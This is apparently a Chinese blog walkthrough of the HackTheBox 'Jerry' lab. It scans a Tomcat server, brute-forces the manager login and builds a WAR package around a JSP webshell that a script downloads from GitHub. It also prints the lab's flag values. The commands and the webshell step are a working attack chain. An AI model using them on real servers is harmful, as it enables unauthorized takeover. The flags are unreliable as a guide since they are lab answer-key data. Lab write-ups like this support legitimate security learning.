[Meachines] [Easy] jerry Tomcat用户暴力破解+war包webshell上传

最新推荐文章于 2024-09-30 21:46:27 发布
最新推荐文章于 2024-09-30 21:46:27 发布
阅读量391 收藏 1
点赞数 9
分类专栏: HackTheBox 文章标签: tomcat java
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141471129
版权

信息收集

IP AddressOpening Ports
10.10.10.95TCP:8080

$ sudo masscan -p1-65535 10.10.10.95 --rate=1000 -e tun0 > /tmp/ports

$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

$ nmap -p$ports 10.10.10.95 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds

Tomcat

https://github.com/bl4de/security-tools/blob/master/apache-tomcat-login-bruteforce.py

爆破tomcat密码

$ python3 apache-tomcat-login-bruteforce.py -H 10.10.10.95

image.png

s3cret

image-2.png

创建 WAR 包

# gen_war.sh
#!/bin/sh 
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp 
rm -rf wshell 
rm -f wshell.war 
mkdir wshell 
cp index.jsp wshell/ 
cd wshell 
jar -cvf ../wshell.war *

$ chmod +x gen_war.sh

$ ./gen_war.sh

image-5.png

image-4.png

image-6.png

可以直接通过这个目录找到两个Flag

http://10.10.10.95:8080/wshell/?sort=1&file=C%3A%5CUsers%5CAdministrator%5CDesktop%5Cflags%5C2+for+the+price+of+1.txt

image-7.png

User.txt

7004dbcef0f854e0fb401875f26ebd00

Root.txt

04a8b36e1545a455393d067e772fe90e

Мартин.
关注
专栏目录
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3446
高危src挖掘
Tomcat漏洞(弱口令war)详解
m0_67402096的博客
08-26 1258
影响版本:Tomcat版本:7.0–>8.0影响说明:后台弱口令登录,上传webshell环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43。
Tomcat后台管理漏洞复现(弱口令+上传webshell)
weixin_51198941的博客
09-08 3020
Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署war,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。在可见,用户tomcat拥有上述所有权限,密码是tomcat。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。
(最新)Tomcat弱口令-上传war获取websehll漏洞复现
qq1140037586的博客
12-17 1650
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点,上传压缩 xxx.war的.war不会被解析,直接访问 xxx/xxx.jsp下的木马文件,拿到webshell
Tomcat7部署wargetshell 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1021
Tomcat7部署wargetshell 漏洞复现
Tomcat弱口令爆破+war部署getshell
baiduxuexin的专栏
01-18 259
Tomcat弱口令爆破+war部署getshell 弱口令爆破--使用burpsuite爆破 提交用户名和密码后抓 不用解码 caidao:
破解tomcat密码并上传webshell
柠檬i的博客
11-14 698
position 3这里选择的是Add from list里面,选择的passwords字典列表。由于tomcat密码默认最大尝试错误次数为5次,需要修改server.xml,修改下面字段。可以使用burp枚举用户名密码,发送数据之前按照格式进行base64编码发送。把冰蝎提供的jsp webshell文件压缩成zip,修改后缀名变成wartomcat默认界面,点击右边的Manager App登录。进入vulnhub的tomcat8目录,启动环境。冰蝎连接,路径为war名下的webshell名。
Tomcat弱口令上传wargetshell
guishengyx的博客
10-19 547
vulfocus靶场
Tomcat后台弱口令上传war漏洞复现
小小猪的博客
11-19 2359
Tomcat后台弱口令上传war漏洞复现 漏洞原因: Tomcat 支持在后台部署war文件,可以直接将webshell部署到web目录下。 解释一下War的概念:war是用来进行Web开发时一个网站项目下的所有代码,括前台HTML/CSS/JS代码,以及后台JavaWeb的代码。当开发人员开发完毕时,就会将源码打给测试人员测试,测试完后若要发布则也会打War进行发布。War可以放在Tomcat下的webapps或word目录,当Tomcat服务器启动时,War即会随之解压源代码来
webshell暴力破解工具 暴力破解
07-30
一款webshell密码暴力破解工具。一款webshell密码暴力破解工具。
WebShell密码暴力破解
02-08
WebShellWebShell密码暴力破解
Tomcat WAR部署getshell
aqi_sec的博客
07-06 2282
Tomcat WAR部署getshell
13-5 tomcat 弱口令war远程部署
weixin_43263566的博客
12-04 1081
Apache Tomcat 是一个开源的Web应用服务器,它主要用于部署和管理基于JavaWeb应用程序。Tomcat 提供了一套完整的管理界面,允许管理员通过Web界面来部署、启动、停止和卸载Web应用程序。这些管理功能通过特定的角色和权限来控制访问。在 Tomcat 中,权限是通过在文件中配置用户角色来管理的。不同的角色允许用户执行不同的操作。manager(后台管理): 这是一个通用角色,通常不会直接赋予用户,而是作为其他管理角色的基础。
【学习笔记】手写 Tomcat
LearnTech_123的博客
09-27 1398
现在的情况是当 Tomcat 接收一个请求后,会先判断是请求的静态资源还是动态资源,如果是动态资源,还要继续判断请求的是哪个功能,然后调用相应的 Servlet 执行。 这样有些缺点,当功能很多时,一个个判断请求的是哪个功能,效率不高,而且代码不够优雅,并且来一个请求就会创建一下 Servlet 对象,比较消耗资源,那如何解决呢?
初识Tomcat
akiramenai的博客
09-25 493
Tomcat是一款可以运行javaWebAPP的服务器软件。一个服务器想要执行java代码,则需要JRE(jvm、java运行环境等),但是需要执行javaWEB项目则还需要服务器软件,Tomacat就是其中很流行的一款。因为一个javaWEB项目会有很多的前后端代码,jar、依赖、xml运行环境等等Tomcat的目录
【SpringBoot详细教程】-08-MybatisPlus详细教程以及SpringBoot整合Mybatis-plus【持续更新】
yueyehuguang的博客
09-30 1500
MybatisPlus(简称MP)是基于MyBatis框架基础上开发的增强型工具,旨在简化开发、提供效率。至于简化在哪里,我们先看一个案例然后再来详细探究MyBatisPlus。MyBatisPlus(简称MP)是基于MyBatis框架基础上开发的增强型工具,旨在简化开发提高效率通过刚才的案例,相信大家能够体会简化开发和提高效率这两个方面的优点。MyBatisPlus的官网为:https://mp.baomidou.com/
【学习笔记】手写 Tomcat
LearnTech_123的博客
09-26 1140
昨天使用了数据库连接池,我们了解了连接池的优点,那么也可以使用线程池来管理线程,java自带的线程池的参数有 核心线程数,最大线程数,线程活跃时间,时间单位,任务队列,线程工厂,拒绝策略。为了学习了解线程池,我们先手写一个简单的线程池,只需要做到核心线程可重复利用就行。
Mybatis的基本使用
最新发布
学习笔记
09-30 886
Mybatis是一个简化JDBC的==持久层框架==,MyBatis是一个==半自动化框架==,是因为它在SQL执行过程中**只提供了基本的SQL执行功能**,而没有像Hibernate那样将所有的ORM操作都自动化了。在MyBatis中,需要手动编写SQL语句,但是它提供了很多便捷的操作,例如参数映射、结果集映射、缓存机制等等,使得开发者能够更加灵活地操作SQL。此外,MyBatis还提供了许多插件机制,可以**对SQL执行流程进行拦截和修改**,以满足各种不同的需求。这也是MyBatis相对于其他ORM
Tomcat安全与部署教程:从入门到Webshell防御
攻击者可以上传WebshellWAR文件,伪装成正常的资源,从而在服务器上执行任意代码。例如,通过将jsp木马打WAR文件并上传,攻击者能够获取Webshell,进而控制服务器。 攻击者还利用Tomcat的权限优势,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值